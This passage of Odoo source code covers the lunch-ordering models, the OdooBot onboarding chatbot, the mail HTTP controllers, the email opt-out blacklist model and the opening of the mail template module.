group_lines[key] += 1
order['company_name'] = order['company'].name
order['currency_id'] = order['currency'].id
order['supplier_id'] = order['supplier'].id
order['supplier_name'] = order['supplier'].name
order['supplier_email'] = order['supplier'].email_formatted
lines = []
# sort by product name, note
for product, note in sorted(group_lines, key=lambda k: (k[0].name, bool(k[1]))):
quantity = group_lines[(product, note)]
lines.append({
'product': product.name,
'note': note or '',
'quantity': quantity,
'price': product.price * quantity,
})
order['amount_total'] = sum(l['price'] for l in lines)
template = self.env.ref('lunch.lunch_order_mail_supplier', raise_if_not_found=False)
ctx = dict(
default_composition_mode='mass_mail',
default_use_template=bool(template),
default_template_id=template.id,
default_lang=order['supplier'].lang or self.env.user.lang,
order=order,
lines=lines,
)
return {
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'mail.compose.message',
'target': 'new',
'context': ctx,
}
else:
raise AccessError(_("Only your lunch manager processes the orders."))
@api.one
def confirm(self):
"""
confirm one or more order line, update order status and create new cashmove
"""
if self.user_has_groups("lunch.group_lunch_manager"):
if self.state != 'confirmed':
values = {
'user_id': self.user_id.id,
'amount': -self.price,
'description': self.product_id.name,
'order_id': self.id,
'state': 'order',
'date': self.date,
}
self.env['lunch.cashmove'].create(values)
self.state = 'confirmed'
else:
raise AccessError(_("Only your lunch manager sets the orders as received."))
@api.one
def cancel(self):
"""
cancel one or more order.line, update order status and unlink existing cashmoves
"""
if self.user_has_groups("lunch.group_lunch_manager"):
self.state = 'cancelled'
self.cashmove.unlink()
else:
raise AccessError(_("Only your lunch manager cancels the orders."))
class LunchProduct(models.Model):
""" Products available to order. A product is linked to a specific vendor. """
_name = 'lunch.product'
_description = 'Lunch Product'
name = fields.Char('Product', required=True)
category_id = fields.Many2one('lunch.product.category', 'Product Category', required=True)
description = fields.Text('Description')
price = fields.Float('Price', digits=dp.get_precision('Account'))
supplier = fields.Many2one('res.partner', 'Vendor')
active = fields.Boolean(default=True)
available = fields.Boolean(compute='_get_available_product', search='_search_available_products')
@api.depends('supplier')
def _get_available_product(self):
for product in self:
if not product.supplier:
product.available = True
else:
alerts = self.env['lunch.alert'].search([
('partner_id', '=', self.supplier.id)
])
if alerts and not any(alert.display for alert in alerts):
# every alert is not available
product.available = False
else:
# no alert for the supplier or at least one is not available
product.available = True
def _search_available_products(self, operator, value):
alerts = self.env['lunch.alert'].search([])
supplier_w_alerts = alerts.mapped('partner_id')
available_suppliers = alerts.filtered(lambda a: a.display).mapped('partner_id')
available_products = self.search([
'|',
('supplier', 'not in', supplier_w_alerts.ids),
('supplier', 'in', available_suppliers.ids)
])
if (operator in expression.NEGATIVE_TERM_OPERATORS and value) or \
(operator not in expression.NEGATIVE_TERM_OPERATORS and not value):
# e.g. (available = False) or (available != True)
return [('id', 'not in', available_products.ids)]
else:
# e.g. (available = True) or (available != False)
return [('id', 'in', available_products.ids)]
class LunchProductCategory(models.Model):
""" Category of the product such as pizza, sandwich, pasta, chinese, burger... """
_name = 'lunch.product.category'
_description = 'Lunch Product Category'
name = fields.Char('Product Category', required=True)
class LunchCashMove(models.Model):
""" Two types of cashmoves: payment (credit) or order (debit) """
_name = 'lunch.cashmove'
_description = 'Lunch Cashmove'
user_id = fields.Many2one('res.users', 'User',
default=lambda self: self.env.uid)
date = fields.Date('Date', required=True, default=fields.Date.context_today)
amount = fields.Float('Amount', required=True, help='Can be positive (payment) or negative (order or payment if user wants to get his money back)')
description = fields.Text('Description', help='Can be an order or a payment')
order_id = fields.Many2one('lunch.order.line', 'Order', ondelete='cascade')
state = fields.Selection([('order', 'Order'), ('payment', 'Payment')],
'Is an order or a payment', default='payment')
@api.multi
def name_get(self):
return [(cashmove.id, '%s %s' % (_('Lunch Cashmove'), '#%d' % cashmove.id)) for cashmove in self]
class LunchAlert(models.Model):
""" Alerts to display during a lunch order. An alert can be specific to a
given day, weekly or daily. The alert is displayed from start to end hour. """
_name = 'lunch.alert'
_description = 'Lunch Alert'
_rec_name = 'message'
display = fields.Boolean(compute='_compute_display_get')
message = fields.Text('Message', required=True)
alert_type = fields.Selection([('specific', 'Specific Day'),
('week', 'Every Week'),
('days', 'Every Day')],
string='Recurrence', required=True, index=True, default='specific')
partner_id = fields.Many2one('res.partner', string="Vendor",
help="If specified, the selected vendor can be ordered only on selected days")
specific_day = fields.Date('Day', default=fields.Date.context_today)
monday = fields.Boolean('Monday')
tuesday = fields.Boolean('Tuesday')
wednesday = fields.Boolean('Wednesday')
thursday = fields.Boolean('Thursday')
friday = fields.Boolean('Friday')
saturday = fields.Boolean('Saturday')
sunday = fields.Boolean('Sunday')
start_hour = fields.Float('Between', oldname='active_from', required=True, default=7)
end_hour = fields.Float('And', oldname='active_to', required=True, default=23)
active = fields.Boolean(default=True)
@api.multi
def name_get(self):
return [(alert.id, '%s %s' % (_('Alert'), '#%d' % alert.id)) for alert in self]
@api.depends('alert_type', 'specific_day', 'monday', 'tuesday', 'thursday',
'friday', 'saturday', 'sunday', 'start_hour', 'end_hour')
def _compute_display_get(self):
"""
This method check if the alert can be displayed today
if alert type is specific : compare specific_day(date) with today's date
if alert type is week : check today is set as alert (checkbox true) eg. self['monday']
if alert type is day : True
return : Message if can_display_alert is True else False
"""
days_codes = {'0': 'sunday',
'1': 'monday',
'2': 'tuesday',
'3': 'wednesday',
'4': 'thursday',
'5': 'friday',
'6': 'saturday'}
fullday = False
now = datetime.datetime.now()
if self.env.context.get('lunch_date'):
# lunch_date is a fields.Date -> 00:00:00
lunch_date = fields.Datetime.from_string(self.env.context['lunch_date'])
# if lunch_date is in the future, planned lunch, ignore hours
fullday = lunch_date > now
now = max(lunch_date, now)
mynow = fields.Datetime.context_timestamp(self, now)
for alert in self:
can_display_alert = {
'specific': (str(alert.specific_day) == fields.Date.to_string(mynow)),
'week': alert[days_codes[mynow.strftime('%w')]],
'days': True
}
if can_display_alert[alert.alert_type]:
hour_to = int(alert.end_hour)
min_to = int((alert.end_hour - hour_to) * 60)
to_alert = datetime.time(hour_to, min_to)
hour_from = int(alert.start_hour)
min_from = int((alert.start_hour - hour_from) * 60)
from_alert = datetime.time(hour_from, min_from)
if fullday or (from_alert <= mynow.time() <= to_alert):
alert.display = True
else:
alert.display = False
```
#### File: mail_bot/models/mail_bot.py
```python
import itertools
import random
from odoo import models, _
class MailBot(models.AbstractModel):
_name = 'mail.bot'
_description = 'Mail Bot'
def _apply_logic(self, record, values, command=None):
""" Apply bot logic to generate an answer (or not) for the user
The logic will only be applied if odoobot is in a chat with a user or
if someone pinged odoobot.
:param record: the mail_thread (or mail_channel) where the user
message was posted/odoobot will answer.
:param values: msg_values of the message_post or other values needed by logic
:param command: the name of the called command if the logic is not triggered by a message_post
"""
odoobot_id = self.env['ir.model.data'].xmlid_to_res_id("base.partner_root")
if len(record) != 1 or values.get("author_id") == odoobot_id:
return
if self._is_bot_pinged(values) or self._is_bot_in_private_channel(record):
body = values.get("body", "").replace(u'\xa0', u' ').strip().lower().strip(".?!")
answer = self._get_answer(record, body, values, command)
if answer:
message_type = values.get('message_type', 'comment')
subtype_id = values.get('subtype_id', self.env['ir.model.data'].xmlid_to_res_id('mail.mt_comment'))
record.with_context(mail_create_nosubscribe=True).sudo().message_post(body=answer, author_id=odoobot_id, message_type=message_type, subtype_id=subtype_id)
def _get_answer(self, record, body, values, command=False):
# onboarding
odoobot_state = self.env.user.odoobot_state
if self._is_bot_in_private_channel(record):
# main flow
if odoobot_state == 'onboarding_emoji' and self._body_contains_emoji(body):
self.env.user.odoobot_state = "onboarding_attachement"
return _("Great! 👍<br/>Now, try to <b>send an attachment</b>, like a picture of your cute dog...")
elif odoobot_state == 'onboarding_attachement' and values.get("attachment_ids"):
self.env.user.odoobot_state = "onboarding_command"
return _("Not a cute dog, but you get it 😊<br/>To access special features, <b>start your sentence with '/'</b>. Try to get help.")
elif odoobot_state == 'onboarding_command' and command == 'help':
self.env.user.odoobot_state = "onboarding_ping"
return _("Wow you are a natural!<br/>Ping someone to grab its attention with @nameoftheuser. <b>Try to ping me using @OdooBot</b> in a sentence.")
elif odoobot_state == 'onboarding_ping' and self._is_bot_pinged(values):
self.env.user.odoobot_state = "idle"
return _("Yep, I am here! 🎉 <br/>You finished the tour, you can <b>close this chat window</b>. Enjoy discovering Odoo.")
elif odoobot_state == "idle" and (_('start the tour') in body.lower()):
self.env.user.odoobot_state = "onboarding_emoji"
return _("To start, try to send me an emoji :)")
# easter eggs
elif odoobot_state == "idle" and body in ['❤️', _('i love you'), _('love')]:
return _("Aaaaaw that's really cute but, you know, bots don't work that way. You're too human for me! Let's keep it professional ❤️")
elif odoobot_state == "idle" and (('help' in body) or _('help') in body):
return _("I'm just a bot... :( You can check <a href=\"https://www.odoo.com/page/docs\">our documentation</a>) for more information!")
elif _('fuck') in body or "fuck" in body:
return _("That's not nice! I'm a bot but I have feelings... 💔")
else:
#repeat question
if odoobot_state == 'onboarding_emoji':
return _("Not exactly. To continue the tour, send an emoji, <b>type \":)\"</b> and press enter.")
elif odoobot_state == 'onboarding_attachement':
return _("To <b>send an attachment</b>, click the 📎 icon on the right, and select a file.")
elif odoobot_state == 'onboarding_command':
return _("Not sure wat you are doing. Please press / and wait for the propositions. Select \"help\" and press enter")
elif odoobot_state == 'onboarding_ping':
return _("Sorry, I am not listening. To get someone's attention, <b>ping him</b>. Write \"@odoobot\" and select me.")
return random.choice([
_("I'm not smart enough to answer your question.<br/>To follow my guide, ask") + ": <b>"+_('start the tour') + "</b>",
_("Hmmm..."),
_("I'm afraid I don't understand. Sorry!"),
_("Sorry I'm sleepy. Or not! Maybe I'm just trying to hide my unawareness of human language...<br/>I can show you features if you write")+ ": '<b>"+_('start the tour')+"</b>'.",
])
elif self._is_bot_pinged(values):
return random.choice([_("Yep, OdooBot is in the place!"), _("Pong.")])
return False
def _body_contains_emoji(self, body):
# coming from https://unicode.org/emoji/charts/full-emoji-list.html
emoji_list = itertools.chain(
range(0x231A, 0x231c),
range(0x23E9, 0x23f4),
range(0x23F8, 0x23fb),
range(0x25AA, 0x25ac),
range(0x25FB, 0x25ff),
range(0x2600, 0x2605),
range(0x2614, 0x2616),
range(0x2622, 0x2624),
range(0x262E, 0x2630),
range(0x2638, 0x263b),
range(0x2648, 0x2654),
range(0x265F, 0x2661),
range(0x2665, 0x2667),
range(0x267E, 0x2680),
range(0x2692, 0x2698),
range(0x269B, 0x269d),
range(0x26A0, 0x26a2),
range(0x26AA, 0x26ac),
range(0x26B0, 0x26b2),
range(0x26BD, 0x26bf),
range(0x26C4, 0x26c6),
range(0x26D3, 0x26d5),
range(0x26E9, 0x26eb),
range(0x26F0, 0x26f6),
range(0x26F7, 0x26fb),
range(0x2708, 0x270a),
range(0x270A, 0x270c),
range(0x270C, 0x270e),
range(0x2733, 0x2735),
range(0x2753, 0x2756),
range(0x2763, 0x2765),
range(0x2795, 0x2798),
range(0x2934, 0x2936),
range(0x2B05, 0x2b08),
range(0x2B1B, 0x2b1d),
range(0x1F170, 0x1f172),
range(0x1F191, 0x1f19b),
range(0x1F1E6, 0x1f200),
range(0x1F201, 0x1f203),
range(0x1F232, 0x1f23b),
range(0x1F250, 0x1f252),
range(0x1F300, 0x1f321),
range(0x1F324, 0x1f32d),
range(0x1F32D, 0x1f330),
range(0x1F330, 0x1f336),
range(0x1F337, 0x1f37d),
range(0x1F37E, 0x1f380),
range(0x1F380, 0x1f394),
range(0x1F396, 0x1f398),
range(0x1F399, 0x1f39c),
range(0x1F39E, 0x1f3a0),
range(0x1F3A0, 0x1f3c5),
range(0x1F3C6, 0x1f3cb),
range(0x1F3CB, 0x1f3cf),
range(0x1F3CF, 0x1f3d4),
range(0x1F3D4, 0x1f3e0),
range(0x1F3E0, 0x1f3f1),
range(0x1F3F3, 0x1f3f6),
range(0x1F3F8, 0x1f400),
range(0x1F400, 0x1f43f),
range(0x1F442, 0x1f4f8),
range(0x1F4F9, 0x1f4fd),
range(0x1F500, 0x1f53e),
range(0x1F549, 0x1f54b),
range(0x1F54B, 0x1f54f),
range(0x1F550, 0x1f568),
range(0x1F56F, 0x1f571),
range(0x1F573, 0x1f57a),
range(0x1F58A, 0x1f58e),
range(0x1F595, 0x1f597),
range(0x1F5B1, 0x1f5b3),
range(0x1F5C2, 0x1f5c5),
range(0x1F5D1, 0x1f5d4),
range(0x1F5DC, 0x1f5df),
range(0x1F5FB, 0x1f600),
range(0x1F601, 0x1f611),
range(0x1F612, 0x1f615),
range(0x1F61C, 0x1f61f),
range(0x1F620, 0x1f626),
range(0x1F626, 0x1f628),
range(0x1F628, 0x1f62c),
range(0x1F62E, 0x1f630),
range(0x1F630, 0x1f634),
range(0x1F635, 0x1f641),
range(0x1F641, 0x1f643),
range(0x1F643, 0x1f645),
range(0x1F645, 0x1f650),
range(0x1F680, 0x1f6c6),
range(0x1F6CB, 0x1f6d0),
range(0x1F6D1, 0x1f6d3),
range(0x1F6E0, 0x1f6e6),
range(0x1F6EB, 0x1f6ed),
range(0x1F6F4, 0x1f6f7),
range(0x1F6F7, 0x1f6f9),
range(0x1F910, 0x1f919),
range(0x1F919, 0x1f91f),
range(0x1F920, 0x1f928),
range(0x1F928, 0x1f930),
range(0x1F931, 0x1f933),
range(0x1F933, 0x1f93b),
range(0x1F93C, 0x1f93f),
range(0x1F940, 0x1f946),
range(0x1F947, 0x1f94c),
range(0x1F94D, 0x1f950),
range(0x1F950, 0x1f95f),
range(0x1F95F, 0x1f96c),
range(0x1F96C, 0x1f971),
range(0x1F973, 0x1f977),
range(0x1F97C, 0x1f980),
range(0x1F980, 0x1f985),
range(0x1F985, 0x1f992),
range(0x1F992, 0x1f998),
range(0x1F998, 0x1f9a3),
range(0x1F9B0, 0x1f9ba),
range(0x1F9C1, 0x1f9c3),
range(0x1F9D0, 0x1f9e7),
range(0x1F9E7, 0x1fa00),
[0x2328, 0x23cf, 0x24c2, 0x25b6, 0x25c0, 0x260e, 0x2611, 0x2618, 0x261d, 0x2620, 0x2626,
0x262a, 0x2640, 0x2642, 0x2663, 0x2668, 0x267b, 0x2699, 0x26c8, 0x26ce, 0x26cf,
0x26d1, 0x26fd, 0x2702, 0x2705, 0x270f, 0x2712, 0x2714, 0x2716, 0x271d, 0x2721, 0x2728, 0x2744, 0x2747, 0x274c,
0x274e, 0x2757, 0x27a1, 0x27b0, 0x27bf, 0x2b50, 0x2b55, 0x3030, 0x303d, 0x3297, 0x3299, 0x1f004, 0x1f0cf, 0x1f17e,
0x1f17f, 0x1f18e, 0x1f21a, 0x1f22f, 0x1f321, 0x1f336, 0x1f37d, 0x1f3c5, 0x1f3f7, 0x1f43f, 0x1f440, 0x1f441, 0x1f4f8,
0x1f4fd, 0x1f4ff, 0x1f57a, 0x1f587, 0x1f590, 0x1f5a4, 0x1f5a5, 0x1f5a8, 0x1f5bc, 0x1f5e1, 0x1f5e3, 0x1f5e8, 0x1f5ef,
0x1f5f3, 0x1f5fa, 0x1f600, 0x1f611, 0x1f615, 0x1f616, 0x1f617, 0x1f618, 0x1f619, 0x1f61a, 0x1f61b, 0x1f61f, 0x1f62c,
0x1f62d, 0x1f634, 0x1f6d0, 0x1f6e9, 0x1f6f0, 0x1f6f3, 0x1f6f9, 0x1f91f, 0x1f930, 0x1f94c, 0x1f97a, 0x1f9c0]
)
if any(chr(emoji) in body for emoji in emoji_list):
return True
return False
def _is_bot_pinged(self, values):
odoobot_id = self.env['ir.model.data'].xmlid_to_res_id("base.partner_root")
return (4, odoobot_id) in values.get('partner_ids', [])
def _is_bot_in_private_channel(self, record):
odoobot_id = self.env['ir.model.data'].xmlid_to_res_id("base.partner_root")
if record._name == 'mail.channel' and record.channel_type == 'chat':
return odoobot_id in record.with_context(active_test=False).channel_partner_ids.ids
return False
```
#### File: mail_bot/models/res_partner.py
```python
from odoo import api, models
class Partner(models.Model):
_inherit = 'res.partner'
def _compute_im_status(self):
#we asume that mail_bot _compute_im_status will be executed after bus _compute_im_status
super(Partner, self)._compute_im_status()
odoobot_id = self.env['ir.model.data'].xmlid_to_res_id("base.partner_root")
for partner in self:
if partner.id == odoobot_id:
partner.im_status = 'bot'
@api.model
def get_mention_suggestions(self, search, limit=8):
#add odoobot in mention suggestion when pinging in mail_thread
[users, partners] = super(Partner, self).get_mention_suggestions(search, limit=limit)
if len(partners) + len(users) < limit and "odoobot".startswith(search.lower()):
odoobot = self.env.ref("base.partner_root")
if not any([elem['id'] == odoobot.id for elem in partners]):
if odoobot:
partners.append({'id': odoobot.id, 'name': odoobot.name, 'email': odoobot.email})
return [users, partners]
```
#### File: mail/controllers/main.py
```python
import base64
import logging
import psycopg2
import werkzeug
from werkzeug import url_encode
from odoo import api, http, registry, SUPERUSER_ID, _
from odoo.addons.web.controllers.main import binary_content
from odoo.exceptions import AccessError
from odoo.http import request
from odoo.tools import consteq, pycompat
_logger = logging.getLogger(__name__)
class MailController(http.Controller):
_cp_path = '/mail'
@classmethod
def _redirect_to_messaging(cls):
url = '/web#%s' % url_encode({'action': 'mail.action_discuss'})
return werkzeug.utils.redirect(url)
@classmethod
def _check_token(cls, token):
base_link = request.httprequest.path
params = dict(request.params)
params.pop('token', '')
valid_token = request.env['mail.thread']._notify_encode_link(base_link, params)
return consteq(valid_token, str(token))
@classmethod
def _check_token_and_record_or_redirect(cls, model, res_id, token):
comparison = cls._check_token(token)
if not comparison:
_logger.warning(_('Invalid token in route %s') % request.httprequest.url)
return comparison, None, cls._redirect_to_messaging()
try:
record = request.env[model].browse(res_id).exists()
except Exception:
record = None
redirect = cls._redirect_to_messaging()
else:
redirect = cls._redirect_to_record(model, res_id)
return comparison, record, redirect
@classmethod
def _redirect_to_record(cls, model, res_id, access_token=None, **kwargs):
# access_token and kwargs are used in the portal controller override for the Send by email or Share Link
# to give access to the record to a recipient that has normally no access.
uid = request.session.uid
# no model / res_id, meaning no possible record -> redirect to login
if not model or not res_id or model not in request.env:
return cls._redirect_to_messaging()
# find the access action using sudo to have the details about the access link
RecordModel = request.env[model]
record_sudo = RecordModel.sudo().browse(res_id).exists()
if not record_sudo:
# record does not seem to exist -> redirect to login
return cls._redirect_to_messaging()
# the record has a window redirection: check access rights
if uid is not None:
if not RecordModel.sudo(uid).check_access_rights('read', raise_exception=False):
return cls._redirect_to_messaging()
try:
record_sudo.sudo(uid).check_access_rule('read')
except AccessError:
return cls._redirect_to_messaging()
else:
record_action = record_sudo.get_access_action(access_uid=uid)
else:
record_action = record_sudo.get_access_action()
if record_action['type'] == 'ir.actions.act_url' and record_action.get('target_type') != 'public':
return cls._redirect_to_messaging()
record_action.pop('target_type', None)
# the record has an URL redirection: use it directly
if record_action['type'] == 'ir.actions.act_url':
return werkzeug.utils.redirect(record_action['url'])
# other choice: act_window (no support of anything else currently)
elif not record_action['type'] == 'ir.actions.act_window':
return cls._redirect_to_messaging()
url_params = {
'view_type': record_action['view_type'],
'model': model,
'id': res_id,
'active_id': res_id,
'action': record_action.get('id'),
}
view_id = record_sudo.get_formview_id()
if view_id:
url_params['view_id'] = view_id
url = '/web?#%s' % url_encode(url_params)
return werkzeug.utils.redirect(url)
@http.route('/mail/receive', type='json', auth='none')
def receive(self, req):
""" End-point to receive mail from an external SMTP server. """
dbs = req.jsonrequest.get('databases')
for db in dbs:
message = base64.b64decode(dbs[db])
try:
db_registry = registry(db)
with db_registry.cursor() as cr:
env = api.Environment(cr, SUPERUSER_ID, {})
env['mail.thread'].message_process(None, message)
except psycopg2.Error:
pass
return True
@http.route('/mail/read_followers', type='json', auth='user')
def read_followers(self, follower_ids, res_model):
followers = []
is_editable = request.env['mail.followers'].user_has_groups('base.group_no_one')
partner_id = request.env.user.partner_id
follower_id = None
follower_recs = request.env['mail.followers'].sudo().browse(follower_ids)
res_ids = follower_recs.mapped('res_id')
request.env[res_model].browse(res_ids).check_access_rule("read")
for follower in follower_recs:
is_uid = partner_id == follower.partner_id
follower_id = follower.id if is_uid else follower_id
followers.append({
'id': follower.id,
'name': follower.partner_id.name or follower.channel_id.name,
'email': follower.partner_id.email if follower.partner_id else None,
'res_model': 'res.partner' if follower.partner_id else 'mail.channel',
'res_id': follower.partner_id.id or follower.channel_id.id,
'is_editable': is_editable,
'is_uid': is_uid,
})
return {
'followers': followers,
'subtypes': self.read_subscription_data(res_model, follower_id) if follower_id else None
}
@http.route('/mail/read_subscription_data', type='json', auth='user')
def read_subscription_data(self, res_model, follower_id):
""" Computes:
- message_subtype_data: data about document subtypes: which are
available, which are followed if any """
followers = request.env['mail.followers'].browse(follower_id)
# find current model subtypes, add them to a dictionary
subtypes = request.env['mail.message.subtype'].search(['&', ('hidden', '=', False), '|', ('res_model', '=', res_model), ('res_model', '=', False)])
subtypes_list = [{
'name': subtype.name,
'res_model': subtype.res_model,
'sequence': subtype.sequence,
'default': subtype.default,
'internal': subtype.internal,
'followed': subtype.id in followers.mapped('subtype_ids').ids,
'parent_model': subtype.parent_id.res_model,
'id': subtype.id
} for subtype in subtypes]
subtypes_list = sorted(subtypes_list, key=lambda it: (it['parent_model'] or '', it['res_model'] or '', it['internal'], it['sequence']))
return subtypes_list
@http.route('/mail/view', type='http', auth='none')
def mail_action_view(self, model=None, res_id=None, access_token=None, **kwargs):
""" Generic access point from notification emails. The heuristic to
choose where to redirect the user is the following :
- find a public URL
- if none found
- users with a read access are redirected to the document
- users without read access are redirected to the Messaging
- not logged users are redirected to the login page
models that have an access_token may apply variations on this.
"""
# ==============================================================================================
# This block of code disappeared on saas-11.3 to be reintroduced by TBE.
# This is needed because after a migration from an older version to saas-11.3, the link
# received by mail with a message_id no longer work.
# So this block of code is needed to guarantee the backward compatibility of those links.
if kwargs.get('message_id'):
try:
message = request.env['mail.message'].sudo().browse(int(kwargs['message_id'])).exists()
except:
message = request.env['mail.message']
if message:
model, res_id = message.model, message.res_id
# ==============================================================================================
if res_id and isinstance(res_id, pycompat.string_types):
res_id = int(res_id)
return self._redirect_to_record(model, res_id, access_token, **kwargs)
@http.route('/mail/assign', type='http', auth='user', methods=['GET'])
def mail_action_assign(self, model, res_id, token=None):
comparison, record, redirect = self._check_token_and_record_or_redirect(model, int(res_id), token)
if comparison and record:
try:
record.write({'user_id': request.uid})
except Exception:
return self._redirect_to_messaging()
return redirect
@http.route('/mail/<string:res_model>/<int:res_id>/avatar/<int:partner_id>', type='http', auth='public')
def avatar(self, res_model, res_id, partner_id):
headers = [('Content-Type', 'image/png')]
status = 200
content = 'R0lGODlhAQABAIABAP///wAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==' # default image is one white pixel
if res_model in request.env:
try:
# if the current user has access to the document, get the partner avatar as sudo()
request.env[res_model].browse(res_id).check_access_rule('read')
if partner_id in request.env[res_model].browse(res_id).sudo().exists().message_ids.mapped('author_id').ids:
status, headers, _content = binary_content(model='res.partner', id=partner_id, field='image_medium', default_mimetype='image/png', env=request.env(user=SUPERUSER_ID))
# binary content return an empty string and not a placeholder if obj[field] is False
if _content != '':
content = _content
if status == 304:
return werkzeug.wrappers.Response(status=304)
except AccessError:
pass
image_base64 = base64.b64decode(content)
headers.append(('Content-Length', len(image_base64)))
response = request.make_response(image_base64, headers)
response.status = str(status)
return response
@http.route('/mail/needaction', type='json', auth='user')
def needaction(self):
return request.env['res.partner'].get_needaction_count()
@http.route('/mail/init_messaging', type='json', auth='user')
def mail_init_messaging(self):
values = {
'needaction_inbox_counter': request.env['res.partner'].get_needaction_count(),
'starred_counter': request.env['res.partner'].get_starred_count(),
'channel_slots': request.env['mail.channel'].channel_fetch_slot(),
'mail_failures': request.env['mail.message'].message_fetch_failed(),
'commands': request.env['mail.channel'].get_mention_commands(),
'mention_partner_suggestions': request.env['res.partner'].get_static_mention_suggestions(),
'shortcodes': request.env['mail.shortcode'].sudo().search_read([], ['source', 'substitution', 'description']),
'menu_id': request.env['ir.model.data'].xmlid_to_res_id('mail.menu_root_discuss'),
'is_moderator': request.env.user.is_moderator,
'moderation_counter': request.env.user.moderation_counter,
'moderation_channel_ids': request.env.user.moderation_channel_ids.ids,
}
return values
```
#### File: mail/models/mail_blacklist.py
```python
import logging
from odoo import api, fields, models, tools, _
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
class MailBlackList(models.Model):
""" Model of blacklisted email addresses to stop sending emails."""
_name = 'mail.blacklist'
_inherit = ['mail.thread']
_description = 'Mail Blacklist'
_rec_name = 'email'
email = fields.Char(string='Email Address', required=True, index=True, help='This field is case insensitive.',
track_visibility=True)
active = fields.Boolean(default=True, track_visibility=True)
_sql_constraints = [
('unique_email', 'unique (email)', 'Email address already exists!')
]
@api.model_create_multi
def create(self, values):
# First of all, extract values to ensure emails are really unique (and don't modify values in place)
new_values = []
all_emails = []
for value in values:
email = self._sanitize_email(value.get('email'))
if not email:
raise UserError(_('Invalid email address %r') % value['email'])
if email in all_emails:
continue
all_emails.append(email)
new_value = dict(value, email=email)
new_values.append(new_value)
""" To avoid crash during import due to unique email, return the existing records if any """
sql = '''SELECT email, id FROM mail_blacklist WHERE email = ANY(%s)'''
emails = [v['email'] for v in new_values]
self._cr.execute(sql, (emails,))
bl_entries = dict(self._cr.fetchall())
to_create = [v for v in new_values
if v['email'] not in bl_entries]
# TODO DBE Fixme : reorder ids according to incoming ids.
results = super(MailBlackList, self).create(to_create)
return self.env['mail.blacklist'].browse(bl_entries.values()) | results
@api.multi
def write(self, values):
if 'email' in values:
values['email'] = self._sanitize_email(values['email'])
return super(MailBlackList, self).write(values)
def _search(self, args, offset=0, limit=None, order=None, count=False, access_rights_uid=None):
""" Override _search in order to grep search on email field and make it
lower-case and sanitized """
if args:
new_args = []
for arg in args:
if isinstance(arg, (list, tuple)) and arg[0] == 'email' and isinstance(arg[2], tools.pycompat.text_type):
sanitized = self.env['mail.blacklist']._sanitize_email(arg[2])
if sanitized:
new_args.append([arg[0], arg[1], sanitized])
else:
new_args.append(arg)
else:
new_args.append(arg)
else:
new_args = args
return super(MailBlackList, self)._search(new_args, offset=offset, limit=limit, order=order, count=count, access_rights_uid=access_rights_uid)
def _add(self, email):
sanitized = self._sanitize_email(email)
record = self.env["mail.blacklist"].with_context(active_test=False).search([('email', '=', sanitized)])
if len(record) > 0:
record.write({'active': True})
else:
record = self.create({'email': email})
return record
def _remove(self, email):
sanitized = self._sanitize_email(email)
record = self.env["mail.blacklist"].with_context(active_test=False).search([('email', '=', sanitized)])
if len(record) > 0:
record.write({'active': False})
else:
record = record.create({'email': email, 'active': False})
return record
def _sanitize_email(self, email):
""" Sanitize and standardize blacklist entries: all emails should be
only real email extracted from strings (A <a@a> -> a@a) and should be
lower case. """
emails = tools.email_split(email)
if not emails or len(emails) != 1:
return False
return emails[0].lower()
class MailBlackListMixin(models.AbstractModel):
""" Mixin that is inherited by all model with opt out.
USAGE : the field '_primary_email' must be overridden in the model that inherit the mixin
and must contain the email field of the model.
"""
_name = 'mail.blacklist.mixin'
_description = 'Mail Blacklist mixin'
_primary_email = ['email']
# Note : is_blacklisted sould only be used for display. As the compute is not depending on the blacklist,
# once read, it won't be re-computed again if the blacklist is modified in the same request.
is_blacklisted = fields.Boolean(string='Blacklist', compute="_compute_is_blacklisted", compute_sudo=True,
store=False, search="_search_is_blacklisted", groups="base.group_user",
help="If the email address is on the blacklist, the contact won't receive mass mailing anymore, from any list")
def _assert_primary_email(self):
if not hasattr(self, "_primary_email") or \
not isinstance(self._primary_email, (list, tuple)) or \
not len(self._primary_email) == 1:
raise UserError(_('Invalid primary email field on model %s') % self._name)
field_name = self._primary_email[0]
if field_name not in self._fields or self._fields[field_name].type != 'char':
raise UserError(_('Invalid primary email field on model %s') % self._name)
@api.model
def _search_is_blacklisted(self, operator, value):
# Assumes operator is '=' or '!=' and value is True or False
self._assert_primary_email()
if operator != '=':
if operator == '!=' and isinstance(value, bool):
value = not value
else:
raise NotImplementedError()
[email_field] = self._primary_email
if value:
query = """
SELECT m.id
FROM mail_blacklist bl
JOIN %s m
ON (LOWER(substring(m.%s, '([^ ,;<@]+@[^> ,;]+)')) = bl.email AND bl.active)
"""
else:
query = """
SELECT m.id
FROM %s m
LEFT JOIN mail_blacklist bl
ON (LOWER(substring(m.%s, '([^ ,;<@]+@[^> ,;]+)')) = bl.email AND bl.active)
WHERE bl.id IS NULL
"""
self._cr.execute(query % (self._table, email_field))
res = self._cr.fetchall()
if not res:
return [(0, '=', 1)]
return [('id', 'in', [r[0] for r in res])]
@api.depends(lambda self: self._primary_email)
def _compute_is_blacklisted(self):
self._assert_primary_email()
[email_field] = self._primary_email
# TODO : Should remove the sudo as compute_sudo defined on methods.
# But if user doesn't have access to mail.blacklist, doen't work without sudo().
sanitized = [self.env['mail.blacklist']._sanitize_email(email) for email in self.mapped(email_field)]
blacklist = set(self.env['mail.blacklist'].sudo().search([('email', 'in', sanitized)]).mapped('email'))
for record in self:
record.is_blacklisted = self.env['mail.blacklist']._sanitize_email(record[email_field]) in blacklist
```
#### File: mail/models/mail_template.py
```python
import babel
import base64
import copy
import datetime
import dateutil.relativedelta as relativedelta
import logging
import functools
import lxml
from werkzeug import urls
from odoo import _, api, fields, models, tools
from odoo.exceptions import UserError
from odoo.tools import pycompat
_logger = logging.getLogger(__name__)
def format_date(env, date, pattern=False):
if not date:
return ''
try:
return tools.format_date(env, date, date_format=pattern)
except babel.core.UnknownLocaleError:
return date
def format_tz(env, dt, tz=False, format=False):
record_user_timestamp = env.user.sudo().with_context(tz=tz or env.user.sudo().tz or 'UTC')
timestamp = fields.Datetime.from_string(dt)
ts = fields.Datetime.context_timestamp(record_user_timestamp, timestamp)
# Babel allows to format datetime in a specific language without change locale
# So month 1 = January in English, and janvier in French
# Be aware that the default value for format is 'medium', instead of 'short'
# medium: Jan 5, 2016, 10:20:31 PM | 5 janv. 2016 22:20:31
